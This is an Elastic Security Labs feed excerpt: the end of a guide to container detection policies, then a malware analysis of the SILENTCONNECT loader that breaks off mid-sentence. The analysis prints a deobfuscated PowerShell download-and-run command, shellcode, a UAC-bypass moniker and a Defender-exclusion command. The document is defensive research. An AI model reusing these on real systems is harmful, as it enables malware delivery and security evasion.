<li><code>/usr/local/**</code> matches everything recursively under <code>/usr/local</code>, including paths such as <code>/usr/local/bin/something</code>.</li>
</ul>
<p>These distinctions make it possible to precisely scope file-based selectors, balancing coverage and noise. In practice, they allow detection engineers to target specific binaries, entire directories, or deep directory trees, depending on the use case, without resorting to overly permissive rules.</p>
<h4>Tying it all together</h4>
<p>Up to this point, we have looked at Defend for Containers selectors, wildcard semantics, event types, and how they surface attacker behavior at runtime. The final step is to understand how these pieces come together within a policy to express real detection logic.</p>
<p>Consider the following policy fragment:</p>
<pre><code class="language-yaml">file:
  selectors:
    - name: binDirExeMods
      operation:
        - createExecutable
        - modifyExecutable
      targetFilePath:
        - /usr/bin/**
    - name: etcFileChanges
      operation:
        - createFile
        - modifyFile
        - deleteFile
      targetFilePath:
        - /etc/**
    - name: nginx
      containerImageName:
        - nginx

  responses:
    - match:
        - binDirExeMods
        - etcFileChanges
      exclude:
        - nginx
      actions:
        - alert
        - block
</code></pre>
<p>This policy defines three selectors. Two selectors (<code>binDirExeMods</code> and <code>etcFileChanges</code>) describe file system activity of interest, while the third selector (<code>nginx</code>) describes a container context to exclude.</p>
<p>The response section ties these selectors together. The selectors listed under <code>match</code> are logically <code>OR</code>’d, meaning that <em>either</em> condition is sufficient to trigger the response. The selector listed under <code>exclude</code> acts as a logical <code>NOT</code>, removing matching events when the container image is <code>nginx</code>.</p>
<p>Read in plain language, the policy expresses the following logic:</p>
<p><em>If an executable is created or modified anywhere under <code>/usr/bin</code>, <strong>or</strong> a file is created, modified, or deleted under <code>/etc</code>, <strong>and</strong> the activity does not originate from an <code>nginx</code> container, then generate an alert and block the action.</em></p>
<p>In Boolean form, this can be expressed as:</p>
<pre><code class="language-text">IF (binDirExeMods OR etcFileChanges) AND NOT nginx
→ alert + block
</code></pre>
<p>This is where Defend for Containers policies become powerful. Rather than writing complex detection logic in a query language, selectors let you decompose behavior into small, reusable building blocks and then combine them declaratively. By mixing path-based selectors, operation types, container context, and exclusions, you can express nuanced detection logic that remains readable and maintainable.</p>
<p>In practice, this model allows detection engineers to translate threat hypotheses directly into policy logic: <em>what</em> behavior matters, <em>where</em> it occurs, <em>in which workloads</em>, and <em>what should happen</em> when it does.</p>
<h4>Policy validation and refinement</h4>
<p>Once a policy is deployed, it is critical to validate it against real workload behavior before enabling aggressive responses such as blocking. Policies that are too restrictive can disrupt normal container operations; policies that are too permissive may let unwanted activity go unnoticed.</p>
<p>A recommended workflow is:</p>
<ol>
<li>Deploy the default policy in monitoring mode (e.g., with selectors logging events).</li>
<li>Observe the events that appear in Elasticsearch to understand normal workload patterns.</li>
<li>Incrementally tighten selectors and responses, moving from <em>log only</em> → <em>alert</em> → <em>block</em>, testing at each stage.</li>
<li>Use a staging or test cluster to validate blocking behaviors before applying them in production.</li>
</ol>
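<p>As an illustrative sketch of step 1, the drift-detection pair from the default policy can be relaxed to log only while you baseline normal workload behavior, and the action promoted later once the event volume is understood:</p>
<pre><code class="language-yaml">file:
  selectors:
    - name: executableChanges
      operation:
        - createExecutable
        - modifyExecutable
  responses:
    - match:
        - executableChanges
      actions:
        - log   # monitoring mode; promote to alert, then block, after validation
</code></pre>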
<h3>Defend for Containers Beta limitations</h3>
<p>As of writing, Defend for Containers is available as a Beta integration, and its current capabilities and platform support reflect that status.</p>
<p>Defend for Containers formally supports Amazon EKS and Google GKE. While the integration can be deployed on Azure AKS, this configuration is not officially supported. In particular, AKS deployments currently lack file event telemetry, which limits detection coverage for file-based attack techniques in those environments.</p>
<p>The current Beta also does not capture network events. As a result, detections related to outbound connections, lateral network movement, or data exfiltration must rely on complementary data sources, such as the <a href="https://www.elastic.co/docs/reference/integrations/network_traffic">Network Packet Capture</a> integration or <a href="https://www.elastic.co/beats/packetbeat">Packetbeat</a>, rather than on Defend for Containers telemetry alone.</p>
<p>For file activity, Defend for Containers intentionally logs file open events only when opened with write intent. This design choice reduces noise and focuses on behavior that modifies the system state. However, it also means that read-only access to sensitive files, such as secret discovery, configuration scraping, or failed access attempts, is not currently observable.</p>
<p>This limitation impacts detection use cases such as:</p>
<ul>
<li>Searching and reading Kubernetes service account tokens,</li>
<li>Scanning for <code>.env</code> files or credential material.</li>
</ul>
<p>These are areas where future Defend for Containers iterations may provide more granular telemetry to support advanced detection engineering use cases.</p>
<h3>Enabling the Defend for Containers pre-built detection rules</h3>
<p>Defend for Containers ships with a set of pre-built detection rules that provide baseline coverage for common container attack techniques. Once the integration is enabled, these rules can be activated directly from Elastic Security without additional configuration.</p>
<p>Enabling the pre-built rules is recommended as a starting point, as they are designed to align with Defend for Containers' runtime telemetry and cover execution, file modification, persistence, and post-compromise behavior inside containers. From there, the rules can be extended or refined to match environment-specific workloads and threat models.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image17.png" alt="Figure 9: Defend for Containers pre-built detection rule installation based on tag" title="Figure 9: Defend for Containers pre-built detection rule installation based on tag" /></p>
<p>By filtering for “Data Source: Elastic Defend for Containers”, you can find all rules associated with this integration.</p>
<p><strong>Note:</strong> if you do not see any rules appear, make sure your stack is running version 9.3.0 or later, as these rules ship only with 9.3.0+.</p>
<p>With all important Beta limitations mapped, the integration deployed, the pre-built detection rules installed and enabled, and a working policy in place, the next step is to explore the event semantics Defend for Containers produces, including fields commonly used in detection logic, performance considerations, and how these events differ from Elastic Defend events.</p>
<h2>Analyzing Defend for Containers events</h2>
<p>Now that Defend for Containers is deployed and policies are in place, the next step is understanding the events it generates. Similar to working with Elastic Defend or Auditd Manager, Defend for Containers telemetry becomes far more valuable once you develop a mental model of how events are structured and which fields are most relevant for detection engineering.</p>
<p>Defend for Containers produces multiple event types, most notably process events and file events, each enriched with container, host, and orchestration context. While the underlying signals remain rooted in Linux behavior, the additional Kubernetes and container metadata enable you to reason about activity in ways not possible with host-only telemetry.</p>
<p>The following sections walk through the most important field groups and event types, using real Defend for Containers events as reference points.</p>
<h3>Common fields</h3>
<p>Before diving into specific event categories, it is useful to understand the fields that consistently appear across Defend for Containers telemetry. These fields provide the contextual glue that ties individual runtime actions back to policies, selectors, and the underlying execution points inside the kernel.</p>
<p>While process and file events differ in their details, the fields described below are present across Defend for Containers data streams and are often the first place to look when validating detections or troubleshooting policy behavior.</p>
<h4>Defend for Containers-specific context</h4>
<p>Defend for Containers adds several fields specific to how events are collected and policies are applied.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image10.png" alt="Figure 10: Defend for Containers’ important cloud_defend.* fields overview" title="Figure 10: Defend for Containers’ important `cloud_defend.*` fields overview" /></p>
<p>The <code>cloud_defend.hook_point</code> field indicates where in the kernel the event was captured. In the example shown, values such as <code>tracepoint__sched_process_fork</code> and <code>tracepoint__sched_process_exec</code> reveal that the event was generated from kernel tracepoints associated with process creation and execution.</p>
<p>The <code>cloud_defend.matched_selectors</code> field shows which selectors in the active policy matched the event. In the example, the value <code>allProcesses</code> indicates that this event matched a broad selector that captures all process activity. When tuning policies or investigating alerts, this field is essential for understanding <em>why</em> an event was captured.</p>
<p>The <code>cloud_defend.package_policy_id</code> and <code>cloud_defend.package_policy_revision</code> fields tie the event back to a specific Elastic Agent policy and its revision. This makes it possible to correlate events with configuration changes over time and to verify which version of a policy was active when the event occurred.</p>
<h4>Event metadata</h4>
<p>Defend for Containers events follow the <a href="https://www.elastic.co/docs/reference/ecs">Elastic Common Schema</a> conventions and include standard event metadata that describes the activity's type and lifecycle.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image2.png" alt="Figure 11: Defend for Containers’ important event.* fields overview" title="Figure 11: Defend for Containers’ important `event.*` fields overview" /></p>
<p>The <code>event.category</code> field identifies the high-level type of activity, such as <code>process</code> or <code>file</code>, and is typically the first field used when filtering Defend for Containers data. The <code>event.action</code> field describes what occurred, for example, <code>fork</code> or <code>exec</code> for process activity, or <code>open</code>, <code>creation</code>, <code>modification</code>, and <code>deletion</code> for file events.</p>
<p>The <code>event.type</code> field adds lifecycle context, such as <code>start</code> for process execution, and is often used together with <code>event.action</code> to distinguish different phases of activity. The <code>event.dataset</code> field indicates the originating Defend for Containers data stream, such as <code>cloud_defend.process</code>, which is useful when building dataset-scoped queries or detections.</p>
<p>Additional metadata fields like <code>event.id</code>, <code>event.ingested</code>, and <code>event.kind</code> are primarily used for correlation, ordering, and troubleshooting rather than detection logic.</p>
<h4>Host information</h4>
<p>Defend for Containers events include full host context, similar to Elastic Defend and Auditd Manager. This makes it possible to correlate container runtime activity back to the underlying Kubernetes node.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image9.png" alt="Figure 12: Defend for Containers’ important host.* fields overview" title="Figure 12: Defend for Containers’ important `host.*` fields overview" /></p>
<p>The <code>host.name</code> field identifies the node on which the container is running, while <code>host.os.*</code> provides operating system details such as distribution and kernel version. The <code>host.architecture</code> field indicates the CPU architecture, which can be relevant when analyzing binary execution or kernel-specific behavior.</p>
<p>One particularly useful field is <code>host.pid_ns_ino</code>, which identifies the PID namespace. This field allows container activity to be correlated with host-level process and kernel telemetry, and is especially valuable when investigating container escape attempts or node-level impact.</p>
<p>This host context is critical when analyzing cloud-native attacks, as multiple containers often share the same host and kernel, and a container's runtime behavior can have implications beyond its boundaries.</p>
<h4>Container and orchestrator context</h4>
<p>Defend for Containers' primary strength lies in its container awareness. Every runtime event is enriched with container and orchestration metadata, allowing activity to be analyzed in the context of <em>what</em> is running, <em>where it is running</em>, and <em>with which privileges</em>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image8.png" alt="Figure 13: Defend for Containers’ important container.* fields overview" title="Figure 13: Defend for Containers’ important `container.*` fields overview" /></p>
<p>At the container level, fields such as <code>container.id</code> and <code>container.name</code> uniquely identify the running container, while <code>container.image.name</code>, <code>container.image.tag</code>, and the image hash provide visibility into the workload’s origin and version. This is especially useful for distinguishing between expected utility images and unexpected or ad hoc workloads.</p>
<p>A key field for risk assessment is <code>container.security_context.privileged</code>. This field explicitly indicates whether a container is running in privileged mode. When privileged execution is combined with other signals such as interactive shells or broad Linux capabilities, the risk profile of any detected activity increases significantly.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image3.png" alt="Figure 14: Defend for Containers’ important orchestrator.* fields overview" title="Figure 14: Defend for Containers’ important `orchestrator.*` fields overview" /></p>
<p>Defend for Containers also enriches events with orchestration context. Fields such as <code>orchestrator.cluster.name</code>, <code>orchestrator.namespace</code>, and <code>orchestrator.resource.name</code> (typically the Pod name) tie runtime behavior back to Kubernetes workloads. Labels exposed via <code>orchestrator.resource.label</code> further allow detections to incorporate workload intent and ownership.</p>
<p>For detection engineering, this context enables precise scoping of detections to:</p>
<ul>
<li>specific namespaces (for example, <code>kube-system</code>),</li>
<li>privileged or high-risk containers,</li>
<li>workloads with sensitive labels,</li>
<li>or known utility images such as <code>netshoot</code>, <code>kubectl</code>, or <code>curl</code>.</li>
</ul>
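<p>A hypothetical selector scoping on such context might look like the following (the name and image values are illustrative, following the condition fields described earlier):</p>
<pre><code class="language-yaml">process:
  selectors:
    - name: kubeSystemUtilityExec   # illustrative name
      operation:
        - exec
      kubernetesNamespace:
        - kube-system
      containerImageName:
        - netshoot
        - kubectl
</code></pre>
<p>Because conditions within a single selector must all hold, this matches process executions only in <code>kube-system</code> <em>and</em> only from the listed utility images.</p>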
<p>This layer of enrichment allows container-aware detection logic to be expressed directly, without having to infer intent indirectly from filesystem paths, cgroups, or namespace identifiers.</p>
<h3>Process events</h3>
<p>Process execution is one of the most important signal types that Defend for Containers provides. Process events capture <code>fork</code>, <code>exec</code>, and <code>end</code> activities within containers and expose detailed lineage information critical to understanding how execution unfolds at runtime.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image12.png" alt="Figure 15: Defend for Containers’ important process.* fields overview" title="Figure 15: Defend for Containers’ important `process.*` fields overview" /></p>
<p>Several fields are particularly important for detection engineering. The combination of <code>process.name</code> and <code>process.executable</code> identifies what was executed and from where, while <code>process.args</code> provides insight into how it was invoked. Fields such as <code>process.pid</code>, <code>process.start</code>, <code>process.end</code>, and <code>process.exit_code</code> describe the process lifecycle and are useful for timing analysis and execution-flow reconstruction. The <code>process.entity_id</code> provides a stable identifier that allows processes to be tracked across multiple related events.</p>
<p>Defend for Containers also captures rich ancestry information. Fields under <code>process.parent.*</code> describe the immediate parent process, making it possible to detect suspicious parent–child relationships such as shells spawned by unexpected binaries. In addition, <code>process.entry_leader.*</code> and <code>process.session_leader.*</code> provide higher-level anchors within the process tree.</p>
<p>Much like Elastic Defend, Defend for Containers models processes as a graph rather than isolated events. The entry leader is especially useful in container environments, as it often represents the initial process launched by the container runtime (for example, <code>containerd</code>, <code>runc</code>, or a shell specified as the container entrypoint). Anchoring detections to the entry leader allows process trees to be interpreted consistently, even when containers spawn many short-lived child processes.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image15.png" alt="Figure 16: Defend for Containers’ important process.session* fields overview" title="Figure 16: Defend for Containers’ important `process.session*` fields overview" /></p>
<p>Session leader fields provide additional context about interactive execution and session boundaries, helping distinguish background services from interactive or attacker-driven activity.</p>
<p>Together, these fields make it possible to express detection logic that goes beyond single executions and instead reasons about execution chains, lineage, and intent, which is essential for detecting real-world container attack techniques.</p>
<h4>Capabilities and privilege context</h4>
<p>One of the more powerful aspects of the Defend for Containers process events is the inclusion of Linux capability information. For each process, Defend for Containers exposes both the effective and permitted capability sets via:</p>
<ul>
<li><code>process.thread.capabilities.effective</code></li>
<li><code>process.thread.capabilities.permitted</code></li>
</ul>
<p>These fields describe what a process is actually allowed to do at runtime, independent of its user ID or container boundary.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image14.png" alt="Figure 17: Defend for Containers’ important process.thread.capabilities.* fields overview" title="Figure 17: Defend for Containers’ important `process.thread.capabilities.*` fields overview" /></p>
<p>In privileged containers, processes often expose a broad set of effective capabilities, including highly sensitive ones such as <code>CAP_SYS_ADMIN</code>, <code>CAP_SYS_MODULE</code>, <code>CAP_SYS_PTRACE</code>, <code>CAP_SYS_RAWIO</code>, and <code>CAP_BPF</code>. The presence of these capabilities significantly changes the risk profile of any executed command, as they enable actions that can directly impact the host kernel or other workloads.</p>
<p>From a detection engineering perspective, this context is critical. It allows detections to move beyond simple process-name matching and instead reason about <em>impact</em>. The same binary execution can have vastly different implications depending on whether it runs with a minimal capability set or with near-host-level privileges.</p>
<p>In practice, capability data enables detection engineers to:</p>
<ul>
<li>Identify suspicious tooling executed inside overly permissive containers.</li>
<li>Correlate runtime behavior with dangerous capability combinations.</li>
<li>Prioritize alerts based on actual exploitation potential rather than surface-level activity.</li>
</ul>
<p>This becomes especially relevant to container breakout research, where the presence or absence of specific capabilities often determines whether an exploit is viable.</p>
<h4>Interactive execution</h4>
<p>The <code>process.interactive</code> field indicates whether a process is associated with an interactive session. In container environments, interactive execution is relatively rare for production workloads and often correlates strongly with post-compromise or hands-on-keyboard activity.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image4.png" alt="Figure 18: Defend for Containers’ important process.*.interactive fields overview" title="Figure 18: Defend for Containers’ important `process.*.interactive` fields overview" /></p>
<p>Defend for Containers exposes interactivity not only at the process level, but also across related execution contexts, including <code>process.parent.interactive</code>, <code>process.entry_leader.interactive</code>, and <code>process.session_leader.interactive</code>. This makes it possible to determine whether an entire execution chain is interactive, rather than relying on a single process flag in isolation.</p>
<p>Common examples of interactive execution within containers include spawning a <code>bash</code> or <code>sh</code> shell, running interactive utilities such as <code>curl</code>, <code>kubectl</code>, or <code>busybox</code>, or operator-driven reconnaissance within a compromised Pod. While these actions may be legitimate during debugging, they are uncommon in steady-state production workloads.</p>
<p>When combined with container image, namespace, and privilege context, interactive execution becomes a strong anomaly signal. It allows detection logic to distinguish between expected automated container behavior and activity more consistent with manual intervention or attacker-driven exploration.</p>
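<p>Assuming the policy schema exposes interactivity as a selector condition (the <code>sessionLeaderInteractive</code> field and selector name below are illustrative), an interactive-session alert could be sketched as:</p>
<pre><code class="language-yaml">process:
  selectors:
    - name: interactiveSessions     # illustrative name
      operation:
        - exec
      sessionLeaderInteractive: true  # assumed condition; verify against the policy schema
  responses:
    - match:
        - interactiveSessions
      actions:
        - alert
</code></pre>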
<h3>File events</h3>
<p>Defend for Containers file events capture filesystem activity inside containers, and are emitted for a variety of operations. Unlike traditional file integrity monitoring, these events are runtime-aware and scoped to container workloads, providing context about <em>how</em> and <em>why</em> file changes occur.</p>
<p>Defend for Containers can detect file activity such as file opens <strong>with write intent</strong>, content modifications, file creations, renames, permission changes, and deletions. By focusing on write-oriented operations, Defend for Containers emphasizes behavior that alters system state rather than passive file access.</p>
<p>This allows detection engineers to reason about file usage patterns at runtime, not just the result of a change.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image6.png" alt="Figure 19: Defend for Containers’ important file events overview" title="Figure 19: Defend for Containers’ important `file` events overview" /></p>
<p>Several fields are particularly important when building file-based detections. The <code>file.path</code> and <code>file.name</code> fields identify the affected file and its location, while <code>file.extension</code> can help distinguish binaries, scripts, and configuration files. The <code>event.action</code> and <code>event.type</code> fields describe what operation occurred and how it should be interpreted in the event lifecycle.</p>
<p>Together, these fields allow Defend for Containers to distinguish benign file access from suspicious modification patterns, such as writing binaries or changing permissions within sensitive directories.</p>
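<p>A minimal sketch of that reasoning, in Python: it flags write-oriented actions that touch sensitive paths. The action names, path prefixes, and event shape are illustrative assumptions rather than the exact values Defend for Containers emits.</p>
<pre><code class="language-python"># Hypothetical triage of file events using the fields described above
# (`file.path`, `event.action`). Action names and prefixes are assumptions.

SENSITIVE_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/etc/")
WRITE_ACTIONS = {"creation", "modification", "rename", "permission_change"}

def is_suspicious_file_event(event):
    """True when a write-oriented action targets a sensitive directory."""
    action_match = event.get("event.action") in WRITE_ACTIONS
    path = event.get("file.path", "")
    # str.startswith accepts a tuple, so one call checks every prefix.
    return action_match and path.startswith(SENSITIVE_PREFIXES)
</code></pre>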
<h3>Bringing it together</h3>
<p>As with any other data source, Defend for Containers telemetry becomes truly valuable once you understand how to combine fields across the process, file, container, and orchestration domains. Rather than relying on static indicators, Defend for Containers enables detection engineering based on runtime behavior, privilege context, and workload identity.</p>
<h2>Conclusion</h2>
<p>Defend for Containers in Elastic Stack 9.3.0 introduces container runtime detection as a core component of Linux detection engineering. It features a clear scope, a policy-driven configuration model, and runtime telemetry designed specifically for containerized workloads.</p>
<p>In this post, we examined how to deploy Defend for Containers, how its policy model is structured, and how runtime events are generated and enriched with container and orchestration context. We explored the structure of process and file events, capability metadata, interactive execution signals, and container-specific fields that allow detections to be expressed in a workload-aware manner.</p>
<p>The key takeaway is that effective container detection requires reasoning about runtime behavior in context: processes, file modifications, privileges, and workload identity must be evaluated together. Defend for Containers provides the necessary telemetry to make that possible.</p>
<p>In the next article, we will build on this foundation by walking through a realistic container attack scenario and demonstrating how Defend for Containers telemetry surfaces each stage of compromise in practice.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/getting-started-with-defend-for-containers.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[From Invitation to Infection: How SILENTCONNECT Delivers ScreenConnect]]></title>
            <link>https://www.elastic.co/security-labs/silentconnect-delivers-screenconnect</link>
            <guid>silentconnect-delivers-screenconnect</guid>
            <pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[SILENTCONNECT is a multi-stage loader that leverages VBScript, in-memory PowerShell execution, and PEB masquerading to silently deploy the ScreenConnect RMM tool.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Elastic Security Labs is observing malicious campaigns delivering a multi-stage infection involving a previously undocumented loader. The infection begins when users are diverted to a Cloudflare Turnstile CAPTCHA page under the guise of a digital invitation. After the link is clicked, a VBScript file is downloaded to the machine. Upon execution, the script retrieves C# source code, which is then compiled and executed in memory using PowerShell. The final payload observed in these campaigns is ScreenConnect, a remote monitoring and management (RMM) tool used to control victim machines.</p>
<p>This campaign highlights a common theme: attackers abusing living-off-the-land binaries (<a href="https://lolbas-project.github.io/">LOLBins</a>) to facilitate execution, as well as using trusted hosting providers such as Google Drive and Cloudflare. While the loader is small and straightforward, it appears to be quite effective and has remained under the radar since March 2025.</p>
<h2>Key takeaways</h2>
<ul>
<li>SILENTCONNECT is a newly discovered loader actively being used in the wild</li>
<li>This loader silently installs ConnectWise ScreenConnect, enabling hands-on keyboard access to victim machines</li>
<li>Campaigns distributing SILENTCONNECT use hosting infrastructure from Cloudflare and Google Drive</li>
<li>SILENTCONNECT uses direct NT API calls and PEB masquerading, and includes both a Windows Defender exclusion and a User Account Control (UAC) bypass</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image13.png" alt="SILENTCONNECT attack diagram" title="SILENTCONNECT attack diagram" /></p>
<h2>SILENTCONNECT infection chain</h2>
<p>In the first week of March, our team observed a living-off-the-land-style infection generating multiple behavioral alerts over a short period.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image12.png" alt="Elastic Defend alerts" title="Elastic Defend alerts" /></p>
<p>The initial VBScript download triggered our <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/execution_suspicious_windows_script_downloaded_from_the_internet.toml">Suspicious Windows Script Downloaded from the Internet rule</a>, which let us pivot to the source of the infection using the associated <code>file.origin_url</code> and <code>file.origin_referrer_url</code> fields.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image10.png" alt="File origin fields" title="File origin fields" /></p>
<p>By navigating to the original landing page, we observed a Cloudflare Turnstile CAPTCHA page. After clicking the human verification checkbox, a VBScript file (<code>E-INVITE.vbs</code>) is downloaded to the machine.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image19.png" alt="Cloudflare CAPTCHA page" title="Cloudflare CAPTCHA page" /></p>
<p>Below is the source code of the landing page, where we can see that the VBScript file (<code>E-INVITE.vbs</code>) is hosted on Cloudflare’s object storage service <a href="https://developers.cloudflare.com/r2/"><code>r2.dev</code></a>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image8.png" alt="Landing page source code" title="Landing page source code" /></p>
<p>Below are other VBScript filenames observed in the last month related to these campaigns:</p>
<ul>
<li><code>Alaska Airlines 2026 Fleet &amp; Route Expansion Summary.vbs</code></li>
<li><code>CODE7_ZOOMCALANDER_INSTALLER_4740.vbs</code></li>
<li><code>2025Trans.vbs</code></li>
<li><code>Proposal-03-2026.vbs</code></li>
<li><code>updatv35.vbs</code></li>
</ul>
<p>The VBScripts are minimally obfuscated, using a children’s story as a decoy, and employ the <code>Replace()</code> and <code>Chr()</code> functions to hide the next stage.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image17.png" alt="Obfuscated VBScript" title="Obfuscated VBScript" /></p>
<p>This script de-obfuscates to the following PowerShell command:</p>
<pre><code>&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -ExecutionPolicy Bypass 
  -command &quot;&quot;New-Item -ItemType Directory -Path 'C:\Windows\Temp' -Force | Out-Null; 
  curl.exe -L 'hxxps://drive.google[.]com/uc?id=1ohZxxT-h7xWVgclB1kvpvwkF0AGWoUtq&amp;export=download' 
  -o 'C:\Windows\Temp\FileR.txt';Start-Sleep -Seconds 
  8;$source = [System.IO.File]::ReadAllText('C:\Windows\Temp\FileR.txt');Start-Sleep 
  -Seconds 1;Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $source 
  -Language CSharp; [HelloWorld]::SayHello()&quot;&quot;
</code></pre>
<p>This snippet uses PowerShell to invoke <code>curl.exe</code> to download a C# payload from Google Drive, which is then written to disk as <code>C:\Windows\Temp\FileR.txt</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image4.png" alt="cURL download via PowerShell" title="cURL download via PowerShell" /></p>
<p>The retrieved C# source code uses an obfuscation technique known as constant unfolding to conceal the byte array used for reflective in-memory execution.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image15.png" alt="C# source code downloaded from Google Drive" title="C# source code downloaded from Google Drive" /></p>
<p>Finally, the PowerShell command compiles the downloaded C# source (<code>FileR.txt</code>) at runtime using <code>Add-Type</code>, loads it into memory as a .NET assembly, and executes it via the <code>[HelloWorld]::SayHello()</code> method.</p>
<h2>SILENTCONNECT</h2>
<p>The following section covers the .NET loader family we call SILENTCONNECT. The sample is relatively small and straightforward, primarily designed to download a remote payload (ScreenConnect) and install it silently on the system.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image5.png" alt="SILENTCONNECT - DNspy namespace/class structure" title="SILENTCONNECT - DNspy namespace/class structure" /></p>
<p>After sleeping for 15 seconds, the malware allocates executable memory via the native Windows API function <code>NtAllocateVirtualMemory</code>, assigning the region <code>PAGE_EXECUTE_READWRITE</code> permissions. SILENTCONNECT stores an embedded byte array containing the following shellcode:</p>
<pre><code>53                        ; push rbx
48 31 DB                  ; xor rbx, rbx
48 31 C0                  ; xor rax, rax
65 48 8B 1C 25 60000000   ; mov rbx, gs:[0x60]  ← PEB address (x64)
48 89 D8                  ; mov rax, rbx        ← return value
5B                        ; pop rbx
C3                        ; ret
</code></pre>
<p>This small shellcode is moved into the recently allocated memory using <code>Marshal.Copy</code>. Next, the malware executes the shellcode in order to retrieve the address of the Process Environment Block (PEB). This approach allows the malware to access process structures directly while avoiding higher-level Windows APIs that are commonly monitored or hooked by security products.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image1.png" alt="Copying shellcode into memory via NtAllocateVirtualMemory" title="Copying shellcode into memory via NtAllocateVirtualMemory" /></p>
<p>SILENTCONNECT uses NTAPIs from <code>ntdll.dll</code> (Native APIs) and <code>ole32.dll</code> (COM APIs) during the delegate setup stage, enabling the malware to invoke functions such as <code>NtWriteVirtualMemory</code> or <code>CoGetObject</code> directly from <code>.NET</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image11.png" alt="Delegate setup for NTAPI’s" title="Delegate setup for NTAPI’s" /></p>
<p><strong>PEB Masquerading</strong></p>
<p>SILENTCONNECT implements a common malware evasion technique known as PEB masquerading. All Windows processes include a kernel-maintained structure known as the <a href="https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb">Process Environment Block</a> (PEB). Among other things, this structure references linked lists of loaded modules, where each entry records the module’s base address, DLL name, and full path. SILENTCONNECT walks this structure to find its own module entry, then overwrites its <code>BaseDllName</code> and <code>FullDllName</code> fields with <code>winhlp32.exe</code> and <code>c:\windows\winhlp32.exe</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image20.png" alt="PEB masquerading feature" title="PEB masquerading feature" /></p>
<p>Much security tooling, including EDRs, treats the PEB as a trusted source when looking for suspicious activity. By presenting a benign module name and path, this technique can hide the malware from such products.</p>
<p>Before launching the payload, the malware implements a UAC bypass using the function <code>LaunchElevatedCOMObjectUnsafe</code> with the moniker string reversed: <code>:wen!rotartsinimdA:noitavelE -&gt; Elevation:Administrator!new:</code></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image18.png" alt="COM setup using elevation moniker" title="COM setup using elevation moniker" /></p>
<p>If the malware is running without elevation, it will attempt the UAC bypass technique via the <a href="https://gist.github.com/api0cradle/d4aaef39db0d845627d819b2b6b30512">CMSTPLUA COM interface</a>. The launch parameters are stored in a character array in reverse order as a simple obfuscation technique.</p>
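<p>The reversed-string trick is trivial to undo. A short Python sketch, using the moniker string observed in the sample:</p>
<pre><code class="language-python"># The elevation moniker is stored reversed as light obfuscation;
# a single slice restores the original string.
reversed_moniker = ":wen!rotartsinimdA:noitavelE"
moniker = reversed_moniker[::-1]
print(moniker)  # Elevation:Administrator!new:
</code></pre>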
<p><img src="https://www.elastic.co/security-labs/assets/images/silentconnect-delivers-screenconnect/image14.png" alt="Launch parameters for ScreenConnect install" title="Launch parameters for ScreenConnect install" /></p>
<p>The first part of this obfuscated command adds a Microsoft Defender exclusion for <code>.exe</code> files.</p>
<pre><code>$ConcreteDataStructure=[char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+
[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]
101;$s=[char](23+23)+[char]101+[char]120+[char]101;&amp;($ConcreteDataStructure) 
-ExclusionExtension $s -Force;
</code></pre>
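<p>The <code>[char]</code> concatenation above decodes straightforwardly; a small Python sketch joining the same code points recovers the hidden cmdlet name and extension:</p>
<pre><code class="language-python"># Decoding the PowerShell [char] concatenation shown above. The code points
# are copied from the sample; joining them reveals the hidden strings.
cmdlet_codes = [65, 100, 100, 45, 77, 112, 80, 114, 101, 102, 101, 114,
                101, 110, 99, 101]
cmdlet = "".join(chr(c) for c in cmdlet_codes)

# [char](23+23) is chr(46), i.e. '.', followed by 'e', 'x', 'e'.
ext_codes = [23 + 23, 101, 120, 101]
ext = "".join(chr(c) for c in ext_codes)

print(cmdlet, ext)  # Add-MpPreference .exe
</code></pre>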
<p>Below is the result of this command in Defender with the exclusion added:<br />
